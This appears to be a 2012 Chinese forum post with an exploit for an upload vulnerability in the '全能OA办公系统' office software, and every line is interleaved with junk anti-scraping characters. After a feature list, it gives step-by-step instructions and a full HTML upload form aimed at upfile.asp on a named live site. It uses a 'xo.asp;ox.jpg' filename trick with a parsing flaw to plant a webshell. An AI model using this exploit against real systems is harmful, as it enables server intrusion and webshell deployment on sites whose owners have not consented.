全能OA办公系统 上传漏洞. _& A$ y4 E2 T+ m6 |
+ [3 q; T' O* t. w8 u
系统介绍:6 v/ h. Y+ j( m9 L4 P/ S# x) D
# h( `7 D7 ?; O. S# x全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
0 G) p3 d: b }2 X4 \, K
2 p# M1 ]% g0 l F; A主要功能:
# o+ t' N4 l4 C0 E; X( N% ~5 p- i公司通告 ) J6 T ?/ X/ Y; J+ B: b& G
工作计划 6 @( i# V& ]( e5 L$ E" |
通讯助理 + W! N, a; L! [& Y
客户资源
U6 K$ _+ w; I9 \/ R! s+ `* I我的公文
& X* l2 Q- R s5 R3 L8 c" A; }公文传阅 6 Q U7 d0 A5 H, G5 l. E& @
公共资源
5 ~5 p2 x' q5 [" y7 @资源预约 7 n* G5 H$ \# |$ T0 ~" B
今日考勤 4 R1 [/ A8 n; ?0 W
个人计划
3 g2 J7 D- d; K个人通讯录
/ A& p! X2 z& H) S2 l3 I0 {: M个人基本档案
( h7 R1 Q* y* |3 y' h8 F未读邮件
, {5 ^' v/ H4 Q3 E. E发邮件
! W; B: b) F: r2 h1 ^+ J$ Q1 r3 w: y收件夹
8 o' k* _& ]* p* W5 d寄件夹
3 j+ K, D* `4 }* h; \# S网络硬盘
" b v! f8 l" _网络会议 0 U& M* g2 U* A: X0 I
网络调查 ' i/ A% M9 L, W2 I2 l
交流论坛: h. y3 _+ V. |' X8 z3 Z: J6 Q
2 y# A# Q$ N0 t+ f- ~有兴趣测试的朋友可以下源码看看# J2 C3 R% r0 d
5 u/ b( J9 w3 G# d
源码下载:
5 }. a! s& v( I. f& |: i b( M N: Y. T1 x4 }- F
http://www.mycodes.net/30/4750.htm& Z/ Y# S; R' I# ^
1 ^5 a, Y6 S6 j
漏洞介绍:1 ?$ U& @0 R9 ]0 ^9 d# ]: B
/ c" g: i7 ?. f' h7 P1 B由upfile.asp上传文件漏洞引起0 P$ h# n% _0 k/ u
4 T. y6 i! y0 R2 U0 A! X测试方法:! z. C3 y" A# Z
1 Q$ G; D" i4 o- n使用名小子上传http://www.itlynn.com/upfile.asp即可
: [ W. l; ~# O* a7 i
1 o( h& N2 r) i. }0 q/ v如果upfile.asp文件被删除不存在。/ L1 u8 D1 s$ u* \' J, G
' d2 p" L1 t$ B: ? 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。, U1 Z' V! \+ T6 o: M! c
5 b. ^6 b* @! B0 O$ A0 |2 |$ d
如果存在那么将如下代码保存为upfile.html。4 A9 T2 S h- q/ z# P/ E1 G% V
2 T9 n' V; p2 n) K然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。& w) Y1 f& ^, F6 N b
8 b C- |9 ~% b( B ) C3 q4 ` P2 u
Q7 x; j7 q' i& G6 ~6 V01 <table border='0' align="center" cellpadding="5">
; h" K7 g1 k( y6 ^6 b% B
! f; m' s/ u3 }' y# \1 H# i02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> . F; h* m( L1 c U U* n+ t, I8 a
4 r# K+ D& B. ^, s+ b, H2 n- M' t
03 <tr> 7 g: t1 D% C! l+ K3 q/ K5 {
7 C9 o7 [# y1 {9 |" d" {0 e' \$ X6 N04 <td>报错:</td>
; S) N3 d- [, W6 \" J
( `9 g Q0 e& ~, G& Y) A1 b1 S05 <td><input type='radio' name='errnumber' value='0'>
: S5 N9 H/ N4 c( V5 j6 a% l# W$ w( T0 v1 d3 v: S
06 自动更名
' W4 @5 i/ Y" i6 x6 ]1 Z6 W
) J+ {" z7 r1 s8 B07 <input type='radio' name='errnumber' value='1' checked>
- Y P. ]) Z, N+ ?$ Y8 x4 Y5 G2 \& r1 @% H! V1 U: Y: M
08 报错方式
; A' a7 {1 d& B6 e. |$ }) C6 q1 s0 [) x! U9 K
09 <input type='radio' name='errnumber' value='2'>
3 |8 T* o. ^, a, H' K- i9 {7 i" K3 j7 |
10 直接覆盖</td>
$ G2 w+ e" v: Q; C3 k, Y& R
6 I" m _3 m7 R" G0 G8 W, R11 </tr>
( {" Z k: _( j, E1 ^$ K% T( ?7 ?' l. y1 u+ T( \$ }7 i
12 <tr>
: J; k x+ S9 x& Y! I
3 @4 }% {- t, Q0 o% J% x13 <td>主题:</td> 9 R* q5 Z* h- n8 X" r6 J& V$ a
* s* Q5 ^" h. |$ f' K5 @7 W14 <td><input type='text' name='filename' size='30'></td> ) T' O) i7 Y0 P4 c. J
6 R3 W" t! _5 j& n- O e15 </tr>
5 `- F. y) ?6 i: Z" C* [
( [9 c \: ~! C! {" N, u C16 <tr> i( k! L- m6 D3 \) I
! _" t5 m0 K' I17 <td>文件:</td>
/ C" ?" c, ~, j/ F
) S( _- H6 b7 O4 i5 B18 <td><input type="file"name="fruit"size="30"></td>
( s% a1 _- q1 x7 u% }/ u. V4 Y% M' w1 U
19 </tr>
2 R, y* x2 W4 M) x
7 V: l. t3 w0 V' M* H$ I20 <tr> - G1 g* m u9 f9 i% F* y
$ n& m* B/ |( i9 i3 \21 <td valign='top'>简介:</td>
! M* M0 i5 Z; p" Z$ ?- `: C7 i1 l1 a j
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> % [: {! f1 z& Q0 ?$ p
: D1 l4 O& E- E0 y/ S
23 </tr> 7 s' R0 G5 W. v' I! }3 D) C
# g$ N! p$ s. C" T7 z& q' z
24 . a' ~/ }- S& H0 @4 {5 J( B1 ~) ?
* B; v6 z% @ _25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ( ^+ n3 D8 Z6 G3 {3 F
2 E: {$ O j7 \0 Q. {- t
26 </tr> Y6 t! c4 J# l0 c5 [* e
" h4 O" m% G) x4 B: M4 Z27 </form>
v* t4 l6 x( g \ j# U$ j
h' ~4 O+ k9 O) W2 I& c* S然后打开上传一个文件名为xo.asp;ox.jpg的文件。
& k3 ^% m, A0 z2 t/ Q$ a& q2 f4 F
* ~5 X/ ~" W U( U5 P/ ?4 H9 g( U7 ~7 m
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
6 u. q: o+ E" r5 c' j7 \& X! C
x; c4 Z& E3 Z- P4 `此漏洞需要配合解析漏洞利用。7 C- V. W' D% O, x
2 W8 i* a* g- G' B) Z8 K |
发表于 2012-11-21 13:45:12
收藏
支持
反对